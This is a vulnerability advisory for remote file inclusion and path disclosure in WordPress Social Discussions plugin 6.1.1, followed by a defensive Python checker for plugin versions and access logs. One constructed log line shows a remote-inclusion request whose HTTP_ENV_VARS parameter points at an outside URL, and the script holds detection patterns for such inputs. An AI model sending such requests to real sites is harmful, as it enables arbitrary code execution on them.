Summary
This host is running WordPress Social Discussions Plugin and is prone to remote file inclusion and full path disclosure vulnerabilities.
Impact
Successful exploitation could allow attackers to execute arbitrary PHP code and to gain sensitive information such as the installation path.
Impact Level: Application
Solution
Update to version 6.1.2 or later.
For updates refer to http://wordpress.org/extend/plugins/social-discussions
Insight
The flaws are due to:
- Improper validation of user-supplied input to the 'HTTP_ENV_VARS' parameter in 'social-discussions-networkpub_ajax.php'.
- Errors in social-discussions/social-discussions-networkpub.php, social-discussions/social-discussions.php and social-discussions/social_discussions_service_names.php, which reveal the full installation path of the script.
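As an added defender-side example (not part of this advisory or of the plugin's own code), the following Python checks an installed copy's plugin file header against the fixed version and flags access-log requests that reach the vulnerable script with a URL-shaped value in HTTP_ENV_VARS. The log lines are constructed, and the assumption that the parameter arrives in the query string (plain or as an array key) is mine.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script and parameter named in the advisory; 6.1.2 is the fixed version.
VULN_SCRIPT = "social-discussions-networkpub_ajax.php"
VULN_PARAM = "HTTP_ENV_VARS"
FIXED_VERSION = (6, 1, 2)

# Matches the 'Version:' line of a WordPress plugin file header.
VERSION_RE = re.compile(r"^\s*\*?\s*Version:\s*([\d.]+)", re.M)
# Matches the request part of a Common Log Format line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Any URL scheme, including stream wrappers such as php:// or data://.
SCHEME_RE = re.compile(r"(?i)^[a-z][a-z0-9+.-]*://")


def parse_version(header_text):
    """Return the plugin version as a tuple, or None if no header was found."""
    m = VERSION_RE.search(header_text)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None


def is_vulnerable_version(header_text):
    """True when the installed plugin is older than the fixed release."""
    v = parse_version(header_text)
    return v is not None and v < FIXED_VERSION


def suspicious_request(log_line):
    """True when a request hits the vulnerable script with a URL in HTTP_ENV_VARS."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return False
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith(VULN_SCRIPT):
        return False
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        # Assumption: the parameter may also be sent as an array key, HTTP_ENV_VARS[...]
        if key.split("[", 1)[0] == VULN_PARAM and SCHEME_RE.match(unquote(value)):
            return True
    return False


# Constructed sample log lines (203.0.113.9 is a documentation address).
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Mar/2015:10:00:01 +0000] "GET /wp-content/plugins/social-discussions/'
    'social-discussions-networkpub_ajax.php?HTTP_ENV_VARS=http%3A%2F%2F203.0.113.9%2Fx.txt HTTP/1.1" 200 512',
    '10.0.0.6 - - [25/Mar/2015:10:00:02 +0000] "GET /wp-content/plugins/social-discussions/'
    'social-discussions.php HTTP/1.1" 200 120',
    '10.0.0.7 - - [25/Mar/2015:10:00:03 +0000] "GET /wp-content/plugins/social-discussions/'
    'social-discussions-networkpub_ajax.php?HTTP_ENV_VARS=about HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print("FLAG" if suspicious_request(line) else "ok  ", line[:80])
```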
Affected
WordPress Social Discussions Plugin version 6.1.1
References
Updated on 2015-03-25